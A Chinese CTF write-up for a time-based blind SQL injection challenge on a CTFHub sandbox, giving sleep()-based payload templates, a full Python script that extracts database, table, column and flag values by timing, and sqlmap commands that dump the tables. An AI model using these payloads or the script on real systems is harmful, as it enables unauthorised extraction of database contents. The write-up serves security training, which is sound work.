小白一个,如有错误请指正
这里使用两种解法
1.python脚本
2.sqlmap
一、需要用到的函数:
length() //返回字符串的长度
ascii() //返回一个字符的ascii码值
substr(字符串,开始位置,截取数量) //截取字符串
sleep() //时间注入的核心函数
if(判断语句,语句一,语句二) //条件为真返回语句一,则返回语句二
二、语句
1.爆数据库长度
if(length(database())=数据库名长度,sleep(3),1)
2.爆数据库名
if(ascii(substr(database(),第i个字符,1))={ord(字符)},sleep(3),1)
3.爆表名
if(ascii(substr((select table_name from information_schema.tables where table_schema= '数据库名' limit 第i个表,1),{k},1))={ord(字符)},sleep(3),1)
4.爆字段名
if(ascii(substr((select column_name from information_schema.columns where table_name = '表名' limit 第i个字段,1),第j个字符,1))={ord(字符)},sleep(3),1)
5.爆具体值
if(ascii(substr((select '字段名' from '表名' limit 第i行数据,1),第j个字符,1))={ord(字符)},sleep(2),0)
三、脚本如下
说明:下面这个脚本是爆出数据库所有的数据,本人比较菜,没能很好的优化(其实是懒),所以写出的这个脚本运行时间很长,大家可以拿到改一下,毕竟能爆出flag就可以了~
import requests
import time
def database_name():
database_length = 0
database_name = ''
for i in range(1, 20):
start = time.time()
url_1 = url + f'1 and if(length(database())={i},sleep(3),1)'
res_1 = requests.get(url_1)
end = time.time()
if end - start >= 2.5:
database_length = i
break
print('数据库长度为:', database_length)
for k in range(1, database_length+1):
for char in dict_flag:
start = time.time()
url_2 = url + f'1 and if(ascii(substr(database(),{k},1))={ord(char)},sleep(3),1)'
# print(url_2)
res_2 = requests.get(url_2)
end = time.time()
if end - start >= 2.5:
database_name = database_name + char
print('数据库名:' + database_name)
return database_name
def tables_name(database_name):
tables_name = []
for table_number in range(0, 2):
table_name = ''
for k in range(0, 7):
for char in dict_flag:
start = time.time()
url_3 = url + f'1 and if(ascii(substr((select table_name from information_schema.tables where table_schema= \'{database_name}\' limit {table_number},1),{k},1))={ord(char)},sleep(3),1)'
# print(url_3)
res_3 = requests.get(url_3)
end = time.time()
if end - start > 2.5:
table_name = table_name + char
print('表名:', table_name)
tables_name.append(table_name)
# print(tables_name)
return tables_name
def columns_name(tables_name):
columns_name = []
for table_name in tables_name:
for column_number in range(0, 2):
column_name = ''
for k in range(0, 6):
for char in dict_flag:
start = time.time()
url_4 = url + f'1 and if(ascii(substr((select column_name from information_schema.columns where table_name = \'{table_name}\' limit {column_number},1),{k},1))={ord(char)},sleep(3),1)'
# print(url_4)
res_4 = requests.get(url_4)
end = time.time()
if end - start > 2.5:
column_name = column_name + char
if column_name != '':
print(f'{table_name}表列名:', column_name)
columns_name.append([table_name, column_name])
# print(columns_name)
return columns_name
def flag_data(tables_columns):
for table_column in tables_columns:
for k in range(0, 3):
flag = ''
for flag_number in range(1, 45):
mark = 0 # 判断字段具体值是否读完
for char in dict_flag:
start = time.time()
url_5 = url + f'1 and if(ascii(substr((select {table_column[1]} from {table_column[0]} limit {k},1),{flag_number},1))={ord(char)},sleep(2),0)'
# print(url_5)
res_5 = requests.get(url_5)
end = time.time()
if end - start > 1.5:
flag = flag + char
mark = 1
if flag == '' or mark == 0:
break
if flag == '':
break
print(f'{table_column[0]}->{table_column[1]}:' + flag)
if __name__ == '__main__':
start_time =time.time()
url = 'http://challenge-28732b148c98f2d4.sandbox.ctfhub.com:10800/?id='
dict_flag = 'qwertyuiopasdfghjklzxcvbnm{}1234567890'
database_name = database_name()
tables_name = tables_name(database_name)
tables_columns = columns_name(tables_name)
flag_data(tables_columns)
end_time = time.time()
print(end_time - start_time)
效果如下:
四、使用sqlmap
1.按步骤来就可以了
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli --tables
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag --columns
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag -C flag --dump